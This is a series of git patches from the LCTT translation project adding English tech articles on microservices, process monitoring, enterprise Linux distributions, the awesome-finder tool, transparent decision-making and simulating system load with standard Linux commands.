+"As more services get deployed overtime, it can become unwieldy to manage," says Mike Kavis, VP and principal cloud architect at [Cloud Technology Partners][10]. "In the true essence of DevOps, make sure that all domain experts - dev, test, security, ops, etc. - are participating up front and collaborating on the best ways to build, deploy, run, and secure container-based microservices.
+
+### 4. Ignoring automation as a table-stakes requirement
+
+In addition to the having the right team, organizations that have the most success with container-based microservices tend to tackle the inherent complexity with an "automate as much as possible" mindset.
+
+"Distributed architectures are not easy, and elements like data persistence, logging, and debugging can get really complex in microservice architectures," says Carlos Sanchez, senior software engineer at [CloudBees][11], of some of the common challenges. By definition, those distributed architectures that Sanchez mentions will become a Herculean operational chore as they grow. "The proliferation of services and components makes automation a requirement," Sanchez advises. "Manual management will not scale."
+
+### 5. Letting microservices fatten up over time
+
+Running a service or software component in a container isn't magic. Doing so does not guarantee that, voila, you've got a microservice. Manual Nedbal, CTO at [ShieldX Networks][12], notes that IT pros need to ensure their microservices stay microservices over time.
+
+"Some software components accumulate lots of code and features over time. Putting them into a container does not necessarily generate microservices and may not yield the same benefits," Nedbal says. "Also, as components grow in size, engineers need to be watchful for opportunities to break up evolving monoliths again."
+
+--------------------------------------------------------------------------------
+
+via: https://enterprisersproject.com/article/2017/9/using-microservices-containers-wisely-5-pitfalls-avoid
+
+作者:[Kevin Casey][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://enterprisersproject.com/user/kevin-casey
+[1]:https://enterprisersproject.com/article/2017/8/5-advantages-containers-writing-applications
+[2]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
+[3]:https://www.digitalocean.com/
+[4]:https://enterprisersproject.com/article/2017/8/how-explain-microservices-plain-english?sc_cid=70160000000h0aXAAQ
+[5]:https://www.sungardas.com/
+[6]:https://www.redhat.com/en
+[7]:https://enterprisersproject.com/user/gordon-haff
+[8]:https://www.redhat.com/en/containers/what-is-kubernetes
+[9]:https://enterprisersproject.com/article/2017/8/devops-jobs-how-spot-great-devops-shop
+[10]:https://www.cloudtp.com/
+[11]:https://www.cloudbees.com/
+[12]:https://www.shieldx.com/
From 3e0a007a8ac7339e3aac3f0a8b6a265c1db9a79c Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:33:26 +0800
Subject: [PATCH 067/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Process=20Monitor?=
=?UTF-8?q?ing?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170928 Process Monitoring.md | 54 +++++++++++++++++++++
1 file changed, 54 insertions(+)
create mode 100644 sources/tech/20170928 Process Monitoring.md
diff --git a/sources/tech/20170928 Process Monitoring.md b/sources/tech/20170928 Process Monitoring.md
new file mode 100644
index 0000000000..c46f4bca12
--- /dev/null
+++ b/sources/tech/20170928 Process Monitoring.md
@@ -0,0 +1,54 @@
+Process Monitoring
+======
+
+Since forking the Mon project to [etbemon [1]][1] I've been spending a lot of time working on the monitor scripts. Actually monitoring something is usually quite easy, deciding what to monitor tends to be the hard part. The process monitoring script ps.monitor is the one I'm about to redesign.
+
+Here are some of my ideas for monitoring processes. Please comment if you have any suggestions for how do do things better.
+
+For people who don't use mon, the monitor scripts return 0 if everything is OK and 1 if there's a problem along with using stdout to display an error message. While I'm not aware of anyone hooking mon scripts into a different monitoring system that's going to be easy to do. One thing I plan to work on in the future is interoperability between mon and other systems such as Nagios.
+
+### Basic Monitoring
+```
+ps.monitor tor:1-1 master:1-2 auditd:1-1 cron:1-5 rsyslogd:1-1 dbus-daemon:1- sshd:1- watchdog:1-2
+```
+
+I'm currently planning some sort of rewrite of the process monitoring script. The current functionality is to have a list of process names on the command line with minimum and maximum numbers for the instances of the process in question. The above is a sample of the configuration of the monitor. There are some limitations to this, the "master" process in this instance refers to the main process of Postfix, but other daemons use the same process name (it's one of those names that's wrong because it's so obvious). One obvious solution to this is to give the option of specifying the full path so that /usr/lib/postfix/sbin/master can be differentiated from all the other programs named master.
+
+The next issue is processes that may run on behalf of multiple users. With sshd there is a single process to accept new connections running as root and a process running under the UID of each logged in user. So the number of sshd processes running as root will be one greater than the number of root login sessions. This means that if a sysadmin logs in directly as root via ssh (which is controversial and not the topic of this post - merely something that people do which I have to support) and the master process then crashes (or the sysadmin stops it either accidentally or deliberately) there won't be an alert about the missing process. Of course the correct thing to do is to have a monitor talk to port 22 and look for the string "SSH-2.0-OpenSSH_". Sometimes there are multiple instances of a daemon running under different UIDs that need to be monitored separately. So obviously we need the ability to monitor processes by UID.
+
+In many cases process monitoring can be replaced by monitoring of service ports. So if something is listening on port 25 then it probably means that the Postfix "master" process is running regardless of what other "master" processes there are. But for my use I find it handy to have multiple monitors, if I get a Jabber message about being unable to send mail to a server immediately followed by a Jabber message from that server saying that "master" isn't running I don't need to fully wake up to know where the problem is.
+
+### SE Linux
+
+One feature that I want is monitoring SE Linux contexts of processes in the same way as monitoring UIDs. While I'm not interested in writing tests for other security systems I would be happy to include code that other people write. So whatever I do I want to make it flexible enough to work with multiple security systems.
+
+### Transient Processes
+
+Most daemons have a second process of the same name running during the startup process. This means if you monitor for exactly 1 instance of a process you may get an alert about 2 processes running when "logrotate" or something similar restarts the daemon. Also you may get an alert about 0 instances if the check happens to run at exactly the wrong time during the restart. My current way of dealing with this on my servers is to not alert until the second failure event with the "alertafter 2" directive. The "failure_interval" directive allows specifying the time between checks when the monitor is in a failed state, setting that to a low value means that waiting for a second failure result doesn't delay the notification much.
+
+To deal with this I've been thinking of making the ps.monitor script automatically check again after a specified delay. I think that solving the problem with a single parameter to the monitor script is better than using 2 configuration directives to mon to work around it.
+
+### CPU Use
+
+Mon currently has a loadavg.monitor script that to check the load average. But that won't catch the case of a single process using too much CPU time but not enough to raise the system load average. Also it won't catch the case of a CPU hungry process going quiet (EG when the SETI at Home server goes down) while another process goes into an infinite loop. One way of addressing this would be to have the ps.monitor script have yet another configuration option to monitor CPU use, but this might get confusing. Another option would be to have a separate script that alerts on any process that uses more than a specified percentage of CPU time over it's lifetime or over the last few seconds unless it's in a whitelist of processes and users who are exempt from such checks. Probably every regular user would be exempt from such checks because you never know when they will run a file compression program. Also there is a short list of daemons that are excluded (like BOINC) and system processes (like gzip which is run from several cron jobs).
+
+### Monitoring for Exclusion
+
+A common programming mistake is to call setuid() before setgid() which means that the program doesn't have permission to call setgid(). If return codes aren't checked (and people who make such rookie mistakes tend not to check return codes) then the process keeps elevated permissions. Checking for processes running as GID 0 but not UID 0 would be handy. As an aside a quick examination of a Debian/Testing workstation didn't show any obvious way that a process with GID 0 could gain elevated privileges, but that could change with one chmod 770 command.
+
+On a SE Linux system there should be only one process running with the domain init_t. Currently that doesn't happen in Stretch systems running daemons such as mysqld and tor due to policy not matching the recent functionality of systemd as requested by daemon service files. Such issues will keep occurring so we need automated tests for them.
+
+Automated tests for configuration errors that might impact system security is a bigger issue, I'll probably write a separate blog post about it.
+
+--------------------------------------------------------------------------------
+
+via: https://etbe.coker.com.au/2017/09/28/process-monitoring/
+
+作者:[Andrew][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://etbe.coker.com.au
+[1]:https://doc.coker.com.au/projects/etbe-mon/
From e4379e247c7863edd0da7a8d1d92bab8e7b7e000 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:35:09 +0800
Subject: [PATCH 068/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Best=20Linux=20Di?=
=?UTF-8?q?stros=20for=20the=20Enterprise?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...7 Best Linux Distros for the Enterprise.md | 84 +++++++++++++++++++
1 file changed, 84 insertions(+)
create mode 100644 sources/tech/20170927 Best Linux Distros for the Enterprise.md
diff --git a/sources/tech/20170927 Best Linux Distros for the Enterprise.md b/sources/tech/20170927 Best Linux Distros for the Enterprise.md
new file mode 100644
index 0000000000..36411a9bfe
--- /dev/null
+++ b/sources/tech/20170927 Best Linux Distros for the Enterprise.md
@@ -0,0 +1,84 @@
+Best Linux Distros for the Enterprise
+======
+In this article, I'll share the top Linux distros for enterprise environments. Some of these distros are used in server and cloud environments along with desktop duties. The one constant that all of these Linux options have is that they are enterprise grade Linux distributions -- so you can expect a high greater degree of functionality and, of course, support.
+
+### What is an enterprise grade Linux distribution?
+
+An enterprise grade Linux distribution comes down to the following - stability and support. Both of these components must be met to take any Linux distribution seriously in an enterprise environment. Stability means that the packages provided are both stable to use, while still maintaining an expected level of security.
+
+The support element of an enterprise grade distribution means that there is a reliable support mechanism in place. Sometimes this is a single (official) source such as a company. In other instances, it might be a governing not-for-profit that provides reliable recommendations to good third party support vendors. Obviously the former option is the best one, however both are acceptable.
+
+### Red Hat Enterprise Linux
+
+[Red Hat][1] has a number of great offerings, all with enterprise grade support made available. Their core focuses are as follows:
+
+\- Red Hat Enterprise Linux Server: This is a group of server offerings that includes everything from container hosting down to SAP server, among other server variants.
+
+\- Red Hat Enterprise Linux Desktop: These are tightly controlled user environments running Red Hat Linux that provide basic desktop functionality. This functionality includes access to the latest applications such as a web browser, email, LibreOffice and more.
+
+\- Red Hat Enterprise Linux Workstation: This is basically Red Hat Enterprise Linux Desktop, but optimized for high-performance tasks. It's also best suited for larger deployments and ongoing administration.
+
+### Why Red Hat Enterprise Linux?
+
+Red Hat is a large, highly successful company that sells services around Linux. Basically Red Hat makes their money from companies that want to avoid vendor lock-in and other related headaches. These companies see the value in hiring open source software experts to manage their servers and other computing needs. A company need only buy a subscription and let Red Hat do the rest in terms of support.
+
+Red Hat is also a solid social citizen. They sponsor open source projects, FoSS advocate websites like OpenSource.com and also provide support to the Fedora project. Fedora is not owned by Red Hat, rather its development is sponsored instead. This allows Fedora to grow while also benefiting Red Hat who then can take what they like from the Fedora project and use it in their enterprise Linux offerings. As things stand now, Fedora acts as an upstream channel of sorts for Red Hat's Enterprise Linux.
+
+### SUSE Linux Enterprise
+
+[SUSE][2] is a fantastic company that provides enterprise users with solid Linux options. SUSE offerings are similar to Red Hat in that both the desktop and server are both focused on by the company. Speaking from my own experiences with SUSE, I believe that YaST has proven to be a huge asset for non-Linux administrators looking to implement Linux boxes into their workplace. YaST provides a friendly GUI for tasks that would otherwise require some basic Linux command line knowledge.
+
+SUSE's core focuses are as follows:
+
+\- SUSE Linux Enterprise Server: This includes task specific solutions ranging from cloud to SAP options, as well as, mission critical computing and software-based data storage.
+
+\- SUSE Linux Enterprise Desktop: For those companies looking to have a solid Linux workstation for their employees, SUSE Linux Enterprise Desktop is a great option. And like Red Hat, SUSE provides access to their support offerings via a subscription model. You can choose three different levels of support.
+
+Why SUSE Linux Enterprise?
+
+SUSE is a company that sells services around Linux, but they do so by focusing on keeping it simple. From their website down to the distribution of Linux offered by SUSE, the focus is ease of use without sacrificing security or reliability. While there is no question at least here in the States that Red Hat is the standard for servers, SUSE has done quite well for themselves both as a company and as contributing members of the open source community.
+
+I'll also go on record in suggesting that SUSE doesn't take themselves too seriously, which is a great thing when you're making connections in the world of IT. From their fun music videos about Linux down to the Gecko used in SUSE trade booths for fun photo opportunities, SUSE presents themselves as simple to understand and approachable.
+
+### Ubuntu LTS Linux
+
+[Ubuntu Long Term Release][3] (LTS) Linux is a simple to use enterprise grade Linux distribution. Ubuntu sees more frequent (and sometimes less stable) updates than the other distros mentioned above. Don't misunderstand, Ubuntu LTS editions are considered to be quite stable. However I think some experts may disagree if you were to suggest that they're bullet proof.
+
+Ubuntu's core focuses are as follows:
+
+\- Ubuntu Desktop: Without question, the Ubuntu desktop is dead simple to learn and get running quickly. What it may lack in advanced installation features, it makes up for with straight forward simplicity. As an added bonus, Ubuntu has more packages available than anyone (except for its father distribution, Debian). I think where Ubuntu really shines is that you can find a number of vendors online that sell Ubuntu pre-installed. This includes servers, desktops and notebooks.
+
+\- Ubuntu Server: This includes server, cloud and container offerings. Ubuntu also provides an interesting concept with their Juju cloud "app store" offering. Ubuntu Server makes a lot of sense for anyone who is familiar with Ubuntu or Debian. For these individuals, it fits like a glove and provides you with the command line tools you already know and love.
+
+Ubuntu IoT: Most recently, Ubuntu's development team has taken aim at creation solutions for the "Internet of Things" (IoT). This includes digital signage, robotics and the IoT gateways themselves. My guess is that the bulk of the IoT growth we'll see with Ubuntu will come from enterprise users and not so much from casual home users.
+
+Why Ubuntu LTS?
+
+Community is Ubuntu's greatest strength. Both with casual users, in addition to their tremendous growth in the already crowded server market. The development and user communities using Ubuntu are rock solid. So while it may be considered more unstable than other enterprise distros, I've found that locking an Ubuntu LTS installation into a 'security updates only' mode provides a very stable experience.
+
+### What about CentOS or Scientific Linux?
+
+First off let's address [CentOS][4] as an enterprise distribution. If you have your own in-house support team to maintain it, then a CentOS installation is a fantastic option. After all, it's compatible with Red Hat Enterprise Linux and offers the same level of stability as Red Hat's offering. Unfortunately it's not going to completely replace a Red Hat support subscription.
+
+And [Scientific Linux][5]? What about that distribution? Well it's like CentOS, it's based on Red Hat Linux. But unlike CentOS, there is no affiliation with Red Hat. Scientific Linux has one mission from its inception - to provide a common Linux distribution for labs across the world. Today, Scientific Linux is basically Red Hat minus the trademark material included.
+
+Neither of these distros are truly interchangeable with Red Hat as they lack the Red Hat support component.
+
+Which of these is the top distro for enterprise? I think that depends on a number of factors that you'd need to figure out for yourself: subscription coverage, availability, cost, services and features offered. These are all considerations each company must determine for themselves. Speaking for myself personally, I think Red Hat wins on the server while SUSE easily wins on the desktop environment. But that's just my opinion - do you disagree? Hit the Comments section below and let's talk about it.
+
+--------------------------------------------------------------------------------
+
+via: https://www.datamation.com/open-source/best-linux-distros-for-the-enterprise.html
+
+作者:[Matt Hartley][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.datamation.com/author/Matt-Hartley-3080.html
+[1]:https://www.redhat.com/en
+[2]:https://www.suse.com/
+[3]:http://releases.ubuntu.com/16.04/
+[4]:https://www.centos.org/
+[5]:https://www.scientificlinux.org/
From e7f72354ff6ecc18d0c90c945177ffac47938259 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:36:51 +0800
Subject: [PATCH 069/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Easily?=
=?UTF-8?q?=20Find=20Awesome=20Projects=20And=20Resources=20Hosted=20In=20?=
=?UTF-8?q?GitHub?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Projects And Resources Hosted In GitHub.md | 159 ++++++++++++++++++
1 file changed, 159 insertions(+)
create mode 100644 sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
diff --git a/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md b/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
new file mode 100644
index 0000000000..efdfc35ee3
--- /dev/null
+++ b/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
@@ -0,0 +1,159 @@
+translating by lujun9972
+How To Easily Find Awesome Projects And Resources Hosted In GitHub
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/Awesome-finder-Find-Awesome-Projects-720x340.png)
+
+Everyday there are hundreds of new additions to the **GitHub** website. Since GitHub has thousands of stuffs, you would be exhausted when searching for a good project. Fortunately, a group of contributors have made a curated lists of awesome stuffs hosted in GitHub. These lists contains a lot of awesome stuffs grouped under different categories such as programming, database, editors, gaming, entertainment and many more. It makes our life much easier to find out any project, software, resource, library, books and all other stuffs hosted in GitHub. A fellow GitHub user went one step ahead and created a command-line utility called **" Awesome-finder"** to find awesome projects and resources on awesome series repositories. This utility helps us to browse through the curated list of awesome lists without leaving the Terminal, without using browser of course.
+
+In this brief guide, I will show you how to easily browse through the curated list of awesome lists in Unix-like systems.
+
+### Awesome-finder - Easily Find Awesome Projects And Resources Hosted In GitHub
+
+#### Installing Awesome-finder
+
+Awesome can be easily installed using **pip** , a package manager for installing programs developed using Python programming language.
+
+On **Arch Linux** and its derivatives like **Antergos** , **Manjaro Linux** , you can install pip using command:
+```
+sudo pacman -S python-pip
+```
+
+On **RHEL** , **CentOS** :
+```
+sudo yum install epel-release
+```
+```
+sudo yum install python-pip
+```
+
+On **Fedora** :
+```
+sudo dnf install epel-release
+```
+```
+sudo dnf install python-pip
+```
+
+On **Debian** , **Ubuntu** , **Linux Mint** :
+```
+sudo apt-get install python-pip
+```
+
+On **SUSE** , **openSUSE** :
+```
+sudo zypper install python-pip
+```
+
+Once PIP installed, run the following command to install 'Awesome-finder' utility.
+```
+sudo pip install awesome-finder
+```
+
+#### Usage
+
+Awesome-finder currently lists the stuffs from the following awesome topics (repositories, of course) from GitHub site:
+
+ * awesome
+ * awesome-android
+ * awesome-elixir
+ * awesome-go
+ * awesome-ios
+ * awesome-java
+ * awesome-javascript
+ * awesome-php
+ * awesome-python
+ * awesome-ruby
+ * awesome-rust
+ * awesome-scala
+ * awesome-swift
+
+
+
+This list will be updated on regular basis.
+
+For instance, to view the curated list from awesome-go repository, just type:
+```
+awesome go
+```
+
+You will see all popular stuffs written using "Go", sorted by alphabetical order.
+
+[![][1]][2]
+
+You can navigate through the list using **UP/DOWN** arrows. Once you found the stuff you looking for, choose it and hit **ENTER** key to open the link in your default web browser.
+
+Similarly,
+
+ * "awesome android" command will search the **awesome-android** repository.
+ * "awesome awesome" command will search the **awesome** repository.
+ * "awesome elixir" command will search the **awesome-elixir**.
+ * "awesome go" will search the **awesome-go**.
+ * "awesome ios" will search the **awesome-ios**.
+ * "awesome java" will search the **awesome-java**.
+ * "awesome javascript" will search the **awesome-javascript**.
+ * "awesome php" will search the **awesome-php**.
+ * "awesome python" will search the **awesome-python**.
+ * "awesome ruby" will search the **awesome-ruby**.
+ * "awesome rust" will search the **awesome-rust**.
+ * "awesome scala" will search the **awesome-scala**.
+ * "awesome swift" will search the **awesome-swift**.
+
+
+
+Also, it automatically displays the suggestions as you type in the prompt. For instance when I type "dj", it displays the stuffs related to Django.
+
+[![][1]][3]
+
+If you wanted to find the awesome things from latest awesome- (not use cache), use -f or -force flag:
+```
+awesome -f (--force)
+
+```
+
+**Example:**
+```
+awesome python -f
+```
+
+Or,
+```
+awesome python --force
+```
+
+The above command will display the curated list of stuffs from **awesome-python** GitHub repository.
+
+Awesome, isn't it?
+
+To exit from this utility, press **ESC** key. To display help, type:
+```
+awesome -h
+```
+
+And, that's all for now. Hope this helps. If you find our guides useful, please share them on your social, professional networks, so everyone will benefit from them. Good good stuffs to come. Stay tuned!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[2]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_008-1.png ()
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_009.png ()
+[4]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=reddit (Click to share on Reddit)
+[5]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=twitter (Click to share on Twitter)
+[6]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=facebook (Click to share on Facebook)
+[7]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=google-plus-1 (Click to share on Google+)
+[8]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=linkedin (Click to share on LinkedIn)
+[9]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=pocket (Click to share on Pocket)
+[10]:whatsapp://send?text=How%20To%20Easily%20Find%20Awesome%20Projects%20And%20Resources%20Hosted%20In%20GitHub%20https%3A%2F%2Fwww.ostechnix.com%2Feasily-find-awesome-projects-resources-hosted-github%2F (Click to share on WhatsApp)
+[11]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=telegram (Click to share on Telegram)
+[12]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=email (Click to email this to a friend)
+[13]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/#print (Click to print)
From 85fefa9a6bb752db1c3598f3c04ca6ee31971bc5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:39:22 +0800
Subject: [PATCH 070/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=203-step=20proc?=
=?UTF-8?q?ess=20for=20making=20more=20transparent=20decisions?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...s for making more transparent decisions.md | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 sources/tech/20170928 A 3-step process for making more transparent decisions.md
diff --git a/sources/tech/20170928 A 3-step process for making more transparent decisions.md b/sources/tech/20170928 A 3-step process for making more transparent decisions.md
new file mode 100644
index 0000000000..80e4d294f6
--- /dev/null
+++ b/sources/tech/20170928 A 3-step process for making more transparent decisions.md
@@ -0,0 +1,81 @@
+A 3-step process for making more transparent decisions
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/GOV_Transparency_A.png?itok=2r47nFJB)
+
+One of the most powerful ways to make your work as a leader more transparent is to take an existing process, open it up for feedback from your team, and then change the process to account for this feedback. The following exercise makes transparency more tangible, and it helps develop the "muscle memory" needed for continually evaluating and adjusting your work with transparency in mind.
+
+I would argue that you can undertake this activity this with any process--even processes that might seem "off limits," like the promotion or salary adjustment processes. But if that's too big for a first bite, then you might consider beginning with a less sensitive process, such as the travel approval process or your system for searching for candidates to fill open positions on your team. (I've done this with our hiring process and promotion processes, for example.)
+
+Opening up processes and making them more transparent builds your credibility and enhances trust with team members. It forces you to "walk the transparency walk" in ways that might challenge your assumptions or comfort level. Working this way does create additional work, particularly at the beginning of the process--but, ultimately, this works well for holding managers (like me) accountable to team members, and it creates more consistency.
+
+### Phase 1: Pick a process
+
+**Step 1.** Think of a common or routine process your team uses, but one that is not generally open for scrutiny. Some examples might include:
+
+ * Hiring: How are job descriptions created, interview teams selected, candidates screened and final hiring decisions made?
+ * Planning: How are your team or organizational goals determined for the year or quarter?
+ * Promotions: How do you select candidates for promotion, consider them, and decide who gets promoted?
+ * Manager performance appraisals: Who receives the opportunity to provide feedback on manager performance, and how are they able to do it?
+ * Travel: How is the travel budget apportioned, and how do you make decisions about whether to approval travel (or whether to nominate someone for travel)?
+
+
+
+One of the above examples may resonate with you, or you may identify something else that you feel is more appropriate. Perhaps you've received questions about a particular process, or you find yourself explaining the rationale for a particular kind of decision frequently. Choose something that you are able to control or influence--and something you believe your constituents care about.
+
+**Step 2.** Now answer the following questions about the process:
+
+ * Is the process currently documented in a place that all constituents know about and can access? If not, go ahead and create that documentation now (it doesn't have to be too detailed; just explain the different steps of the process and how it works). You may find that the process isn't clear or consistent enough to document. In that case, document it the way you think it should work in the ideal case.
+ * Does the completed process documentation explain how decisions are made at various points? For example, in a travel approval process, does it explain how a decision to approve or deny a request is made?
+ * What are the inputs of the process? For example, when determining departmental goals for the year, what data is used for key performance indicators? Whose feedback is sought and incorporated? Who has the opportunity to review or "sign off"?
+ * What assumptions does this process make? For example, in promotion decisions, do you assume that all candidates for promotion will be put forward by their managers at the appropriate time?
+ * What are the outputs of the process? For example, in assessing the performance of the managers, is the result shared with the manager being evaluated? Are any aspects of the review shared more broadly with the manager's direct reports (areas for improvement, for example)?
+
+
+
+Avoid making judgements when answering the above questions. If the process doesn't clearly explain how a decision is made, that might be fine. The questions are simply an opportunity to assess the current state.
+
+Next, revise the documentation of the process until you are satisfied that it adequately explains the process and anticipates the potential questions.
+
+### Phase 2: Gather feedback
+
+The next phase involves sharing the process with your constituents and asking for feedback. Sharing is easier said than done.
+
+**Step 1.** Encourage people to provide feedback. Consider a variety of mechanisms for doing this:
+
+ * Post the process somewhere people can find it internally and note where they can make comments or provide feedback. A Google document works great with the ability to comment on specific text or suggest changes directly in the text.
+ * Share the process document via email, inviting feedback
+ * Mention the process document and ask for feedback during team meetings or one-on-one conversations
+ * Give people a time window within which to provide feedback, and send periodic reminders during that window.
+
+
+
+If you don't get much feedback, don't assume that silence is equal to endorsement. Try asking people directly if they have any idea why feedback is not coming in. Are people too busy? Is the process not as important to people as you thought? Have you effectively articulated what you're asking for?
+
+**Step 2.** Iterate. As you get feedback about the process, engage the team in revising and iterating on the process. Incorporate ideas and suggestions for improvement, and ask for confirmation that the intended feedback has been applied. If you don't agree with a suggestion, be open to the discussion and ask yourself why you don't agree and what the merits are of one method versus another.
+
+Setting a timebox for collecting feedback and iterating is helpful to move things forward. Once feedback has been collected and reviewed, discussed and applied, post the final process for the team to review.
+
+### Phase 3: Implement
+
+Implementing a process is often the hardest phase of the initiative. But if you've taken account of feedback when revising your process, people should already been anticipating it and will likely be more supportive. The documentation you have from the iterative process above is a great tool to keep you accountable on the implementation.
+
+**Step 1.** Review requirements for implementation. Many processes that can benefit from increased transparency simply require doing things a little differently, but you do want to review whether you need any other support (tooling, for example).
+
+**Step 2.** Set a timeline for implementation. Review the timeline with constituents so they know what to expect. If the new process requires a process change for others, be sure to provide enough time for people to adapt to the new behavior, and provide communication and reminders.
+
+**Step 3.** Follow up. After using the process for 3-6 months, check in with your constituents to see how it's going. Is the new process more transparent? More effective? More predictable? Do you have any lessons learned that could be used to improve the process further?
+
+### About The Author
+Sam Knuth;I Have The Privilege To Lead The Customer Content Services Team At Red Hat;Which Produces All Of The Documentation We Provide For Our Customers. Our Goal Is To Provide Customers With The Insights They Need To Be Successful With Open Source Technology In The Enterprise. Connect With Me On Twitter
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/open-organization/17/9/exercise-in-transparent-decisions
+
+作者:[a][Sam Knuth]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/samfw
From 95d79336c10a076963bd3032c1b46734dde0cc96 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:45:17 +0800
Subject: [PATCH 071/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Simulate=20System?=
=?UTF-8?q?=20Loads?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20170924 Simulate System Loads.md | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 sources/tech/20170924 Simulate System Loads.md
diff --git a/sources/tech/20170924 Simulate System Loads.md b/sources/tech/20170924 Simulate System Loads.md
new file mode 100644
index 0000000000..2808f9b4d5
--- /dev/null
+++ b/sources/tech/20170924 Simulate System Loads.md
@@ -0,0 +1,81 @@
+translating by lujun9972
+Simulate System Loads
+======
+Sysadmins often need to discover how the performance of an application is affected when the system is under certain types of load. This means that an artificial load must be re-created. It is, of course, possible to install dedicated tools to do this but this option isn't always desirable or possible.
+
+Every Linux distribution comes with all the tools needed to create load. They are not as configurable as dedicated tools but they will always be present and you already know how to use them.
+
+### CPU
+
+The following command will generate a CPU load by compressing a stream of random data and then sending it to `/dev/null`:
+```
+cat /dev/urandom | gzip -9 > /dev/null
+
+```
+
+If you require a greater load or have a multi-core system simply keep compressing and decompressing the data as many times as you need e.g.:
+```
+cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
+
+```
+
+Use `CTRL+C` to end the process.
+
+### RAM
+
+The following process will reduce the amount of free RAM. It does this by creating a file system in RAM and then writing files to it. You can use up as much RAM as you need to by simply writing more files.
+
+First, create a mount point then mount a `ramfs` filesystem there:
+```
+mkdir z
+mount -t ramfs ramfs z/
+
+```
+
+Then, use `dd` to create a file under that directory. Here a 128MB file is created:
+```
+dd if=/dev/zero of=z/file bs=1M count=128
+
+```
+
+The size of the file can be set by changing the following operands:
+
+ * **bs=** Block Size. This can be set to any number followed **B** for bytes, **K** for kilobytes, **M** for megabytes or **G** for gigabytes.
+ * **count=** The number of blocks to write.
+
+
+
+### Disk
+
+We will create disk I/O by firstly creating a file, and then use a for loop to repeatedly copy it.
+
+This command uses `dd` to generate a 1GB file of zeros:
+```
+dd if=/dev/zero of=loadfile bs=1M count=1024
+
+```
+
+The following command starts a for loop that runs 10 times. Each time it runs it will copy `loadfile` over `loadfile1`:
+```
+for i in {1..10}; do cp loadfile loadfile1; done
+
+```
+
+If you want it to run for a longer or shorter time change the second number in `{1..10}`.
+
+If you prefer the process to run forever until you kill it with `CTRL+C` use the following command:
+```
+while true; do cp loadfile loadfile1; done
+
+```
+--------------------------------------------------------------------------------
+
+via: https://bash-prompt.net/guides/create-system-load/
+
+作者:[Elliot Cooper][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
